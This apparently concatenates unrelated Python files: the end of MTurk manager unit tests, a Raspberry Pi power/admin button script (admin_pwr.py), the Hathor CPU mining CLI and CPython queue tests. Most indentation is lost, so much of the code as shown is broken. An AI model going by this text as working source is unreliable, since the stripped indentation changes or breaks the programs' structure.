self.assertTrue(agent.hit_is_expired)
self.assertEqual(data['inactive_text'], special_disconnect_text)
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
test_ack_function.assert_called()
def test_get_qualifications(self):
manager = self.mturk_manager
mturk_utils = MTurkManagerFile.mturk_utils
mturk_utils.find_or_create_qualification = mock.MagicMock()
# create a qualification list with nothing but a provided junk qual
fake_qual = {
'QualificationTypeId': 'fake_qual_id',
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept',
}
qualifications = manager.get_qualification_list([fake_qual])
self.assertListEqual(qualifications, [fake_qual])
self.assertListEqual(manager.qualifications, [fake_qual])
mturk_utils.find_or_create_qualification.assert_not_called()
        # Create a qualification list using all the default types
disconnect_qual_name = 'disconnect_qual_name'
disconnect_qual_id = 'disconnect_qual_id'
block_qual_name = 'block_qual_name'
block_qual_id = 'block_qual_id'
max_time_qual_name = 'max_time_qual_name'
max_time_qual_id = 'max_time_qual_id'
unique_qual_name = 'unique_qual_name'
unique_qual_id = 'unique_qual_id'
def return_qualifications(qual_name, _text, _sb):
if qual_name == disconnect_qual_name:
return disconnect_qual_id
if qual_name == block_qual_name:
return block_qual_id
if qual_name == max_time_qual_name:
return max_time_qual_id
if qual_name == unique_qual_name:
return unique_qual_id
mturk_utils.find_or_create_qualification = return_qualifications
manager.opt['disconnect_qualification'] = disconnect_qual_name
manager.opt['block_qualification'] = block_qual_name
manager.opt['max_time_qual'] = max_time_qual_name
manager.opt['unique_qual_name'] = unique_qual_name
manager.is_unique = True
manager.has_time_limit = True
manager.qualifications = None
qualifications = manager.get_qualification_list()
for qual in qualifications:
self.assertEqual(qual['ActionsGuarded'], 'DiscoverPreviewAndAccept')
self.assertEqual(qual['Comparator'], 'DoesNotExist')
for qual_id in [
disconnect_qual_id,
block_qual_id,
max_time_qual_id,
unique_qual_id,
]:
has_qual = False
for qual in qualifications:
if qual['QualificationTypeId'] == qual_id:
has_qual = True
break
self.assertTrue(has_qual)
self.assertListEqual(qualifications, manager.qualifications)
def test_create_additional_hits(self):
manager = self.mturk_manager
manager.opt['hit_title'] = 'test_hit_title'
manager.opt['hit_description'] = 'test_hit_description'
manager.opt['hit_keywords'] = 'test_hit_keywords'
manager.opt['reward'] = 0.1
mturk_utils = MTurkManagerFile.mturk_utils
fake_hit = 'fake_hit_type'
mturk_utils.create_hit_type = mock.MagicMock(return_value=fake_hit)
mturk_utils.subscribe_to_hits = mock.MagicMock()
mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=('page_url', 'hit_id', 'test_hit_response')
)
manager.server_url = 'test_url'
manager.task_group_id = 'task_group_id'
manager.topic_arn = 'topic_arn'
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
manager.server_url, manager.task_group_id
)
hit_url = manager.create_additional_hits(5)
mturk_utils.create_hit_type.assert_called_once()
mturk_utils.subscribe_to_hits.assert_called_with(
fake_hit, manager.is_sandbox, manager.topic_arn
)
self.assertEqual(len(mturk_utils.create_hit_with_hit_type.call_args_list), 5)
mturk_utils.create_hit_with_hit_type.assert_called_with(
opt=manager.opt,
page_url=mturk_chat_url,
hit_type_id=fake_hit,
num_assignments=1,
is_sandbox=manager.is_sandbox,
)
self.assertEqual(len(manager.hit_id_list), 5)
self.assertEqual(hit_url, 'page_url')
def test_expire_all_hits(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
completed_hit_id = 'completed'
incomplete_1 = 'incomplete_1'
incomplete_2 = 'incomplete_2'
MTurkManagerFile.mturk_utils.expire_hit = mock.MagicMock()
worker_manager.get_complete_hits = mock.MagicMock(
return_value=[completed_hit_id]
)
manager.hit_id_list = [completed_hit_id, incomplete_1, incomplete_2]
manager.expire_all_unassigned_hits()
worker_manager.get_complete_hits.assert_called_once()
expire_calls = MTurkManagerFile.mturk_utils.expire_hit.call_args_list
self.assertEqual(len(expire_calls), 2)
for hit in [incomplete_1, incomplete_2]:
found = False
for expire_call in expire_calls:
if expire_call[0][1] == hit:
found = True
break
self.assertTrue(found)
def test_qualification_management(self):
manager = self.mturk_manager
test_qual_name = 'test_qual'
other_qual_name = 'other_qual'
test_qual_id = 'test_qual_id'
worker_id = self.agent_1.worker_id
mturk_utils = MTurkManagerFile.mturk_utils
success_id = 'Success'
def find_qualification(qual_name, _sandbox):
if qual_name == test_qual_name:
return test_qual_id
return None
mturk_utils.find_qualification = find_qualification
mturk_utils.give_worker_qualification = mock.MagicMock()
mturk_utils.remove_worker_qualification = mock.MagicMock()
mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=success_id
)
# Test give qualification
manager.give_worker_qualification(worker_id, test_qual_name)
mturk_utils.give_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, None, manager.is_sandbox
)
# Test revoke qualification
manager.remove_worker_qualification(worker_id, test_qual_name)
mturk_utils.remove_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, manager.is_sandbox, ''
)
# Test create qualification can exist
result = manager.create_qualification(test_qual_name, '')
self.assertEqual(result, success_id)
# Test create qualification can't exist failure
result = manager.create_qualification(test_qual_name, '', False)
self.assertIsNone(result)
# Test create qualification can't exist success
result = manager.create_qualification(other_qual_name, '')
self.assertEqual(result, success_id)
def test_partner_disconnect(self):
manager = self.mturk_manager
manager.send_command = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_IN_TASK)
manager._handle_partner_disconnect(self.agent_1)
self.assertEqual(
self.agent_1.get_status(), AssignState.STATUS_PARTNER_DISCONNECT
)
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, self.agent_1.worker_id)
self.assertEqual(assignment_id, self.agent_1.assignment_id)
self.assertDictEqual(data, self.agent_1.get_inactive_command_data())
@testing_utils.retry()
def test_restore_state(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
worker_manager.change_agent_conversation = mock.MagicMock()
manager.send_command = mock.MagicMock()
agent = self.agent_1
agent.conversation_id = 'Test_conv_id'
agent.id = 'test_agent_id'
agent.request_message = mock.MagicMock()
agent.message_request_time = time.time()
test_message = {
'text': 'this_is_a_message',
'message_id': 'test_id',
'type': data_model.MESSAGE_TYPE_MESSAGE,
}
agent.append_message(test_message)
manager._restore_agent_state(agent.worker_id, agent.assignment_id)
self.assertFalse(agent.alived)
manager.send_command.assert_not_called()
worker_manager.change_agent_conversation.assert_called_once_with(
agent=agent, conversation_id=agent.conversation_id, new_agent_id=agent.id
)
agent.alived = True
assert_equal_by(lambda: len(agent.request_message.call_args_list), 1, 0.6)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, agent.worker_id)
self.assertEqual(assignment_id, agent.assignment_id)
self.assertListEqual(data['messages'], agent.get_messages())
self.assertEqual(data['text'], data_model.COMMAND_RESTORE_STATE)
def test_expire_onboarding(self):
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
self.agent_2.set_status(AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
manager.force_expire_hit.assert_called_once_with(
self.agent_2.worker_id, self.agent_2.assignment_id
)
if __name__ == '__main__':
unittest.main(buffer=True)
|
admin_pwr.py
|
#!/usr/bin/env python2.7
import RPi.GPIO as GPIO
import time
import os
import subprocess
from threading import Thread
import socket
import sys
import syslog
# Path of the Unix domain socket where the LED server is listening
server_address = '/var/run/uds_led'
# Identify the board from /proc/cpuinfo so the matching GPIO pins are used
hardware = os.popen(
    "cat /proc/cpuinfo | grep Hardware | awk '{print $3}'"
).readlines()[0].strip('\n')
if (hardware == "BCM2835"):
GPIO.setmode(GPIO.BOARD)
# previous bread board setup
# POWER_BUTTON_PIN = 33
# ADMIN_BUTTON_PIN = 35
# MCSC_BUTTON_PIN = 37
    # new circuit board setup
POWER_BUTTON_PIN = 15
ADMIN_BUTTON_PIN = 13
MCSC_BUTTON_PIN = 11
elif (hardware == "sun8iw11p1"):
GPIO.setmode(GPIO.BOARD)
POWER_BUTTON_PIN = 33
ADMIN_BUTTON_PIN = 35
MCSC_BUTTON_PIN = 37
else:
    print "No compatible hardware found! Check /proc/cpuinfo!"
quit()
GPIO.setup(POWER_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ADMIN_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(MCSC_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
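# Power-button hold thresholds in seconds: holding at least POWEROFF_TIMER
# powers the box off, holding at least REBOOT_TIMER reboots it instead.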
POWEROFF_TIMER = 2
REBOOT_TIMER = 5
# global variable to distinguish between modes
# 0: operation
# 1: admin
# 2: admin1/2/3
# 3: program select
# 4: program execution
# 5: program complete
mode = 0
power_flag = 0
mcsc_flag = 0
admin_flag = 0
# variables to store operation mode white and yellow status,
# for when mcsc xor admin buttons are pressed.
op_white = 0
op_yellow = 0
CONF_PATH = "/home/portex/program_config.txt"
def send_command(message):
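    # Open a short-lived connection to the LED daemon listening on the UNIX
    # domain socket at server_address, send a single command string, then
    # close the socket. Connection errors are logged to stderr and ignored.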
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(server_address)
except socket.error, msg:
print >>sys.stderr, msg
return
try:
# Send data
print >>sys.stderr, 'sending "%s"' % message
sock.sendall(message)
finally:
print >>sys.stderr, 'closing socket'
sock.close()
def power_callback(channel):
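    # Falling-edge callback for the power button.
    # Operation mode: holding the button for REBOOT_TIMER seconds reboots the
    # box; releasing it after at least POWEROFF_TIMER seconds powers it off;
    # shorter presses are cancelled.
    # Admin mode: selects admin1. Program-select mode: records power_flag.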
global admin_index
global mode
global timer_double_counter
global power_flag
if mode == 0:
time.sleep(0.5)
pressed_time = 0.5
while (GPIO.input(POWER_BUTTON_PIN) == GPIO.LOW):
# while the power button is held down
if (pressed_time >= REBOOT_TIMER):
os.system('wall "Power button pressed for reboot...."')
send_command("green_blink")
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
os.system('shutdown -r now')
time.sleep(100)
return
time.sleep(1)
pressed_time += 1
if (pressed_time < POWEROFF_TIMER):
os.system('wall "Power button press cancelled."')
else:
os.system('wall "Power button pressed for power off..."')
send_command("green_blink")
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
os.system('shutdown -h now')
time.sleep(100)
elif mode == 1:
admin_index = 1
send_command("go_to_admin1")
mode = 2
timer_double_counter = 0
elif mode == 3:
# program select here.
power_flag = 1
return
def run_mcsc(type):
# executes after mcsc button press in operation mode.
# if config file not found, or command not found,
# run standard command instead.
# type = start or stop in string.
strip_char_list = " \t\n"
admin_index = "SI"
if type == "start":
program_index = "B37_1"
elif type == "stop":
program_index = "B37_0"
else:
print "run_mcsc type has to be start or stop."
return
file_flag = True
command_list = []
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found for run_mcsc."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
file_flag = False
if file_flag:
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command_list = words[2].strip(strip_char_list).split(" ")
print command_list
break
if not command_list:
# run standard command here.
if type == "start":
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'start'], shell=False)
print "MCS Cloud connect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud connect.")
elif type == "stop":
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
else:
try:
return_code = subprocess.call(command_list)
temp_string = "Execute mcsc program " + str(command_list)
temp_string += ", exit " + str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
except:
temp_string = 'mcsc command "' + str(command_list)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
return
def mcsc_callback(channel):
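    # Falling-edge callback for the MCSC button.
    # Operation mode: toggles the white LED and starts/stops the MCSC cloud
    # connection (ignored when the admin button is also held down).
    # Admin mode: selects admin2. Program-select mode: records mcsc_flag.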
global admin_index
global mode
global timer_double_counter
global mcsc_flag
global op_white
time.sleep(.1)
if GPIO.input(MCSC_BUTTON_PIN) == GPIO.HIGH:
print "button let go false event."
return
if mode == 0:
time.sleep(.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second
print "mcsc operation mode mcsc+admin held down."
return
if op_white == 1:
send_command("white_off")
op_white = 0
# time.sleep(3)
run_mcsc("stop")
else:
send_command("white_on")
op_white = 1
# time.sleep(2)
run_mcsc("start")
elif mode == 1:
time.sleep(.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second
print "mcsc admin mode mcsc+admin held down."
return
admin_index = 2
send_command("go_to_admin2")
mode = 2
timer_double_counter = 0
elif mode == 3:
# program select here.
mcsc_flag = 1
return
def return_to_operation():
send_command("return_to_operation")
syslog.syslog(syslog.LOG_INFO, 'Return to operation mode.')
return
def return_to_admin():
global timer_double_counter
global admin_flag
global mcsc_flag
global power_flag
timer_double_counter = 0
admin_flag = 0
mcsc_flag = 0
power_flag = 0
send_command("return_to_admin")
return
def run_program():
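    # Worker thread: wait out the 6 second program-select window, combine the
    # admin/mcsc/power button flags into a program index, run the matching
    # command from the config file, then fall back to admin mode.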
global mode
time.sleep(6)
total_program_index = admin_flag + (mcsc_flag << 1) + (power_flag << 2)
print "admin index: ", admin_index
print "program index: ", total_program_index
send_command("go_to_execute")
time.sleep(2)
read_and_run(str(admin_index), str(total_program_index))
print "program output here."
time.sleep(6)
mode = 1
return_to_admin()
return
def read_and_run(admin_index, program_index):
# results and their color displays:
# blink blue: return code 0 only
# blink red: return code others
    # blink blue_red: all exceptions, and index not found.
strip_char_list = " \t\n"
temp_string = "admin index: " + admin_index
temp_string += ", program index: " + program_index
print temp_string
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
return
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command = words[2].strip(strip_char_list).split(" ")
print command
try:
return_code = subprocess.call(command)
temp_string = "execute program " + admin_index
temp_string += "/" + program_index + ", exit "
temp_string += str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
if return_code == 0:
send_command("admin_blink_blue")
else:
send_command("admin_blink_red")
except:
print "cannot execute."
temp_string = 'command "' + str(command)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
finally:
return
# admin/program index not found.
temp_string = "program " + admin_index + "/" + program_index
temp_string += " not found."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
return
def run_admin(type):
# executes after admin button press in operation mode.
# if config file not found, or command not found,
# run standard command instead.
# type = start or stop in string.
strip_char_list = " \t\n"
admin_index = "SI"
if type == "start":
program_index = "B35_1"
elif type == "stop":
program_index = "B35_0"
else:
print "run_admin type has to be start or stop."
return
file_flag = True
command_list = []
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found for run_admin."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
file_flag = False
if file_flag:
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command_list = words[2].strip(strip_char_list).split(" ")
print command_list
break
if not command_list:
# run standard command here.
print type
if type == "start":
# subprocess.call(['python', '/opt/mcs/cbox_panel_control/bin/led_bt_server.py'],
# shell=False)
# os.system('service bluetooth start')
# os.system('/opt/mcs/cbox_panel_control/bin/led_bt_server.py > /dev/null &')
print "Bluetooth console enable"
syslog.syslog(syslog.LOG_INFO, "Bluetooth console enable.")
elif type == "stop":
# subprocess.call(['ps -ef | grep led_bt_server | grep -v grep |awk \'{print "kill "$2}\' | bash'], shell=True)
# os.system('service bluetooth stop')
send_command("return_to_operation")
print "Bluetooth console disable"
syslog.syslog(syslog.LOG_INFO, "Bluetooth console disable.")
else:
try:
return_code = subprocess.call(command_list)
temp_string = "Execute admin program " + str(command_list)
temp_string += ", exit " + str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
except:
temp_string = 'admin command "' + str(command_list)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
return
GPIO.add_event_detect(POWER_BUTTON_PIN, GPIO.FALLING, callback=power_callback,
bouncetime=1000)
GPIO.add_event_detect(MCSC_BUTTON_PIN, GPIO.FALLING, callback=mcsc_callback,
bouncetime=1000)
try:
while True:
while (GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW):
time.sleep(1)
ch = GPIO.wait_for_edge(ADMIN_BUTTON_PIN, GPIO.FALLING,
timeout=6000)
#print "Falling edge detected."
if (mode == 0):
# operation mode
if ch is None:
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second,
# enter admin mode
print "admin mode activated."
syslog.syslog(syslog.LOG_INFO, 'Start admin mode.')
mode = 1
return_to_admin()
continue
if op_yellow == 1:
print "yellow_off"
send_command("yellow_off")
op_yellow = 0
# time.sleep(3)
run_admin("stop")
else:
print "yellow on"
send_command("yellow_on")
op_yellow = 1
# time.sleep(2)
run_admin("start")
elif (mode == 1):
if ch is None:
if timer_double_counter > 2:
print "admin timeout in admin mode."
return_to_operation()
mode = 0
continue
else:
timer_double_counter += 1
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
print "Returning to operation mode from admin."
return_to_operation()
mode = 0
continue
# if here, go to admin3
admin_index = 3
send_command("go_to_admin3")
mode = 2
timer_double_counter = 0
elif mode == 2:
if ch is None:
if timer_double_counter > 2:
print "admin timeout in admin1/2/3 mode."
return_to_operation()
mode = 0
continue
else:
timer_double_counter += 1
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
print "Returning to operation mode from admin3."
return_to_operation()
mode = 0
continue
# admin1/2/3 start.
mode = 3
send_command("admin_blink_red")
run_program_process = Thread(target=run_program)
run_program_process.start()
elif mode == 3:
# program select here.
admin_flag = 1
except KeyboardInterrupt:
print "interrupted."
|
mining.py
|
# Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import math
import signal
import sys
import time
from argparse import ArgumentParser, Namespace
from json.decoder import JSONDecodeError
from multiprocessing import Process, Queue
from typing import Tuple
import requests
_SLEEP_ON_ERROR_SECONDS = 5
_MAX_CONN_RETRIES = math.inf
def signal_handler(sig, frame):
sys.exit(0)
def worker(q_in, q_out):
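    # Child process: take a block and a nonce range from the input queue,
    # mine it, and put the (hopefully solved) block on the output queue.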
signal.signal(signal.SIGINT, signal_handler)
block, start, end, sleep_seconds = q_in.get()
block.start_mining(start, end, sleep_seconds=sleep_seconds)
q_out.put(block)
def create_parser() -> ArgumentParser:
from hathor.cli.util import create_parser
parser = create_parser()
parser.add_argument('url', help='URL to get mining bytes')
parser.add_argument('--init-delay', type=float, help='Wait N seconds before starting (in seconds)', default=None)
parser.add_argument('--sleep', type=float, help='Sleep every 2 seconds (in seconds)')
parser.add_argument('--count', type=int, help='Quantity of blocks to be mined')
parser.add_argument('--address', help='Address to mine blocks')
return parser
def execute(args: Namespace) -> None:
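    # Main mining loop: request a block template from the node, mine it in a
    # child process over the full 32-bit nonce range, verify and submit the
    # solved block, and repeat until --count blocks have been mined.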
from requests.exceptions import ConnectionError
from hathor.transaction import Block
from hathor.transaction.exceptions import HathorError
print('Hathor CPU Miner v1.0.0')
print('URL: {}'.format(args.url))
if args.init_delay:
print('Init delay {} seconds'.format(args.init_delay))
time.sleep(args.init_delay)
signal.signal(signal.SIGINT, signal_handler)
sleep_seconds = 0
if args.sleep:
sleep_seconds = args.sleep
total = 0
conn_retries = 0
q_in: Queue[Tuple[Block, int, int, int]]
q_out: Queue[Block]
q_in, q_out = Queue(), Queue()
while True:
print('Requesting mining information...')
try:
params = {}
if args.address:
params['address'] = args.address
response = requests.get(args.url, params=params)
except ConnectionError as e:
print('Error connecting to server: {}'.format(args.url))
print(e)
if conn_retries >= _MAX_CONN_RETRIES:
print('Too many connection failures, giving up.')
sys.exit(1)
else:
conn_retries += 1
print('Waiting {} seconds to try again ({} of {})...'.format(_SLEEP_ON_ERROR_SECONDS, conn_retries,
_MAX_CONN_RETRIES))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
else:
conn_retries = 0
if response.status_code == 503:
print('Node still syncing. Waiting {} seconds to try again...'.format(_SLEEP_ON_ERROR_SECONDS))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
try:
data = response.json()
except JSONDecodeError as e:
print('Error reading response from server: {}'.format(response))
print(e)
print('Waiting {} seconds to try again...'.format(_SLEEP_ON_ERROR_SECONDS))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
if 'block_bytes' not in data:
print('Something is wrong in the response.')
print(data)
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
block_bytes = base64.b64decode(data['block_bytes'])
block = Block.create_from_struct(block_bytes)
assert block.hash is not None
assert isinstance(block, Block)
print('Mining block with weight {}'.format(block.weight))
p = Process(target=worker, args=(q_in, q_out))
p.start()
q_in.put((block, 0, 2**32, sleep_seconds))
p.join()
block = q_out.get()
block.update_hash()
assert block.hash is not None
print('[{}] New block found: {} (nonce={}, weight={})'.format(datetime.datetime.now(), block.hash.hex(),
block.nonce, block.weight))
try:
block.verify_without_storage()
except HathorError:
print('[{}] ERROR: Block has not been pushed because it is not valid.'.format(datetime.datetime.now()))
else:
block_bytes = block.get_struct()
response = requests.post(args.url, json={'block_bytes': base64.b64encode(block_bytes).decode('utf-8')})
if not response.ok:
print('[{}] ERROR: Block has been rejected. Unknown exception.'.format(datetime.datetime.now()))
if response.ok and response.text != '1':
print('[{}] ERROR: Block has been rejected.'.format(datetime.datetime.now()))
print('')
total += 1
if args.count and total == args.count:
break
def main():
parser = create_parser()
args = parser.parse_args()
execute(args)
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import Queue
import time
import unittest
from test import test_support
threading = test_support.import_module('threading')
QUEUE_SIZE = 5
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTest(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(not q.empty(), "Queue should not be empty")
self.assertTrue(not q.full(), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(q.full(), "Queue should be full")
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except Queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except Queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except Queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except Queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x is None:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in xrange(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(None) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
class QueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.Queue
class LifoQueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.LifoQueue
class PriorityQueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(Queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException, "You Lose"
return Queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException, "You Lose"
return Queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
